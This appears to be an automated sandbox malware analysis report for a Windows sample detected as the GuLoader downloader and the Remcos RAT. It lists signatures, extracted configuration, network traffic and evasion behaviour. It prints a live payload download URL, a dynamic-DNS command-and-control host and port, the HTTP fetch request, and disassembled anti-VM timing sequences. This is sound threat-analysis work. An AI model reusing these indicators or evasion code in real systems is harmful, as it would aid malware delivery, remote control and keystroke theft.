Loading ...

Play interactive tourEdit tour

Windows Analysis Report LzbZ4T1iV8.exe

Overview

General Information

Sample Name:LzbZ4T1iV8.exe
Analysis ID:458125
MD5:41e1bc9de5f3b61639fb88143e933ff8
SHA1:432531c5a0f7f82b8ec10e7f3fde1b51ebd3d0e8
SHA256:d32cf33f8f64824f799ca44e9988ddc517e88db1235f93792d3ed2ddaa48e35f
Tags:exe
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • LzbZ4T1iV8.exe (PID: 7032 cmdline: 'C:\Users\user\Desktop\LzbZ4T1iV8.exe' MD5: 41E1BC9DE5F3B61639FB88143E933FF8)
    • LzbZ4T1iV8.exe (PID: 1504 cmdline: 'C:\Users\user\Desktop\LzbZ4T1iV8.exe' MD5: 41E1BC9DE5F3B61639FB88143E933FF8)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin^"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin^"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: LzbZ4T1iV8.exeVirustotal: Detection: 17%Perma Link
      Source: LzbZ4T1iV8.exeReversingLabs: Detection: 17%
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY
      Machine Learning detection for sampleShow sources
      Source: LzbZ4T1iV8.exeJoe Sandbox ML: detected
      Source: LzbZ4T1iV8.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin^
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: wealthyrem.ddns.net
      Source: global trafficTCP traffic: 192.168.2.4:49767 -> 194.5.97.128:39200
      Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
      Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
      Source: global trafficHTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: global trafficHTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
      Source: unknownDNS traffic detected: queries for: wealthyrem.ddns.net
      Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmpString found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
      Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmpString found in binary or memory: http://101.99.94.119/WEALTH_PRUuqVZw139.binwininet.dllMozilla/5.0

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Installs a global keyboard hookShow sources
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\LzbZ4T1iV8.exe

      E-Banking Fraud:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000D.00000002.1716863368.00000000006E7000.00000004.00000020.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F588C NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F03CA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F8FC4 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F93EC NtResumeThread,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F4C19 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F7EA4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F42C4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F58FA NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F474F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F43A8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F61C5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F93FB NtResumeThread,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 13_2_00569B42 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 13_2_00569C0E LdrInitializeThunk,Sleep,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 13_2_00569B3D TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_00404478
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_00404418
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_00404834
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_004036F0
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_004034F4
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_00403488
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_004046B4
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_00404774
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_00404534
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_004045F4
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_004035B2
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_004043B8
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F8680
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F0567
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F03CA
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F0BEF
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F93EC
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F4C19
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F424C
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F8A4B
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F3C48
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F0E55
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F8C67
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F9E67
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F1060
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F0E7A
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F1070
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F0C8E
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F808E
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F249F
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F2899
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F7EA4
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F56A3
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F2EA2
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F14C6
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F42C4
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F20C0
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F7AD9
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F10EB
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F7EE6
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F20FE
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F2CF2
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F3912
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F5D10
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F7F34
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F474F
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F154C
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F5D5D
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F0B55
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F1D68
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F1D73
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F43A8
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F3FBC
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F61C5
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F37D8
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F0BD2
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F77FF
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F89FD
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F93FB
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F87FA
      Source: LzbZ4T1iV8.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: LzbZ4T1iV8.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: LzbZ4T1iV8.exe, 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
      Source: LzbZ4T1iV8.exe, 0000000D.00000002.1721652241.000000001DD60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs LzbZ4T1iV8.exe
      Source: LzbZ4T1iV8.exe, 0000000D.00000000.861623499.0000000000417000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
      Source: LzbZ4T1iV8.exeBinary or memory string: OriginalFilenameGYMNOSPERMAE.exe vs LzbZ4T1iV8.exe
      Source: LzbZ4T1iV8.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/2
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeFile created: C:\Users\user\AppData\Roaming\remcosJump to behavior
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeFile created: C:\Users\user\AppData\Local\Temp\~DF7C81C95CE370506E.TMPJump to behavior
      Source: LzbZ4T1iV8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: LzbZ4T1iV8.exeVirustotal: Detection: 17%
      Source: LzbZ4T1iV8.exeReversingLabs: Detection: 17%
      Source: unknownProcess created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess created: C:\Users\user\Desktop\LzbZ4T1iV8.exe 'C:\Users\user\Desktop\LzbZ4T1iV8.exe'

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_004018D2 push fs; retf
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F662F push cs; iretd
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F003D push esp; iretd
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F00AA push esp; iretd
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 13_2_0056A006 pushfd ; iretd
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 13_2_00569F30 pushfd ; retf
      Source: initial sampleStatic PE information: section name: .text entropy: 7.08169017725
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F03CA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeCode function: 1_2_020F0BEF NtWriteVirtualMemory,TerminateProcess,LoadLibraryA,
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: LzbZ4T1iV8.exe, 00000001.00000002.862725777.0000000002100000.00000004.00000001.sdmp, LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: LzbZ4T1iV8.exe, 0000000D.00000002.1716793566.0000000000670000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://101.99.94.119/WEALTH_PRUUQVZW139.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 00000000020F74C3 second address: 00000000020F7542 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push D90E6CFBh 0x00000010 call 00007F7AFC9FAF32h 0x00000015 mov dword ptr [ebp+04h], eax 0x00000018 mov ebx, dword ptr [eax+3Ch] 0x0000001b add eax, ebx 0x0000001d mov ebx, dword ptr [eax+78h] 0x00000020 mov eax, dword ptr [ebp+04h] 0x00000023 add eax, ebx 0x00000025 mov ecx, dword ptr [eax+18h] 0x00000028 mov dword ptr [ebp+08h], ecx 0x0000002b mov ecx, dword ptr [eax+1Ch] 0x0000002e mov dword ptr [ebp+14h], ecx 0x00000031 mov ecx, dword ptr [eax+24h] 0x00000034 mov dword ptr [ebp+10h], ecx 0x00000037 mov esi, dword ptr [eax+20h] 0x0000003a add esi, dword ptr [ebp+04h] 0x0000003d xor ecx, ecx 0x0000003f mov edx, dword ptr [esi] 0x00000041 add edx, dword ptr [ebp+04h] 0x00000044 mov dword ptr [ebp+000001F3h], eax 0x0000004a test si, 2E1Ah 0x0000004f mov eax, ecx 0x00000051 push eax 0x00000052 mov eax, dword ptr [ebp+000001F3h] 0x00000058 mov dword ptr [ebp+000001C8h], ebx 0x0000005e mov ebx, esi 0x00000060 push ebx 0x00000061 pushad 0x00000062 rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 00000000020F7542 second address: 00000000020F7542 instructions:
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 00000000020F734C second address: 00000000020F734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC9FAEFEh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 00000000020F8236 second address: 00000000020F8261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC461375h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 00000000020F7D0C second address: 00000000020F7D0C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00B1C905h 0x00000007 xor eax, AE894D5Ah 0x0000000c xor eax, 9A90F0F9h 0x00000011 add eax, CB578B5Bh 0x00000016 cpuid 0x00000018 test ch, dh 0x0000001a popad 0x0000001b call 00007F7AFC9FAF1Bh 0x00000020 lfence 0x00000023 mov edx, 770EC33Bh 0x00000028 sub edx, 4238A07Dh 0x0000002e xor edx, 9CFEAEA4h 0x00000034 xor edx, D7D68C0Eh 0x0000003a mov edx, dword ptr [edx] 0x0000003c lfence 0x0000003f jmp 00007F7AFC9FAFF9h 0x00000044 test ch, ah 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a add edi, edx 0x0000004c dec dword ptr [ebp+000000F8h] 0x00000052 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000059 jne 00007F7AFC9FAEFAh 0x0000005b cmp edx, eax 0x0000005d call 00007F7AFC9FAF5Ch 0x00000062 call 00007F7AFC9FAF3Eh 0x00000067 lfence 0x0000006a mov edx, 770EC33Bh 0x0000006f sub edx, 4238A07Dh 0x00000075 xor edx, 9CFEAEA4h 0x0000007b xor edx, D7D68C0Eh 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 jmp 00007F7AFC9FAFF9h 0x0000008b test ch, ah 0x0000008d ret 0x0000008e mov esi, edx 0x00000090 pushad 0x00000091 rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 00000000020F7E99 second address: 00000000020F7E99 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, FE410F8Bh 0x00000013 xor eax, 50497853h 0x00000018 xor eax, DF92CCE2h 0x0000001d add eax, 8E6544C7h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F7AFC461A6Eh 0x0000002e cmp edx, eax 0x00000030 popad 0x00000031 test esi, 5A8E86D2h 0x00000037 call 00007F7AFC461551h 0x0000003c lfence 0x0000003f rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 00000000020F0504 second address: 00000000020F0504 instructions:
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 000000000056734C second address: 000000000056734C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 inc ebx 0x00000004 inc edx 0x00000005 dec ecx 0x00000006 test ecx, ecx 0x00000008 jne 00007F7AFC46130Eh 0x0000000a mov al, byte ptr [edx] 0x0000000c mov byte ptr [ebx], al 0x0000000e pushad 0x0000000f mov ecx, 00000009h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\LzbZ4T1iV8.exeRDTSC instruction interceptor: First address: 0000000000568236 second address: 0000000000568261 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub esi, 6F48A402h 0x00000011 cmp dword ptr [edi+14h], esi 0x00000014 mov esi, dword ptr [ebp+000001F0h] 0x0000001a je 00007F7AFC9FAF65h 0x0000001c mov dword ptr [ebp+00000246h], eax 0x00000022 mov eax, 3E9A0B50h 0x00000027 pushad 0x00000028 lfence 0x0000002b rdtsc
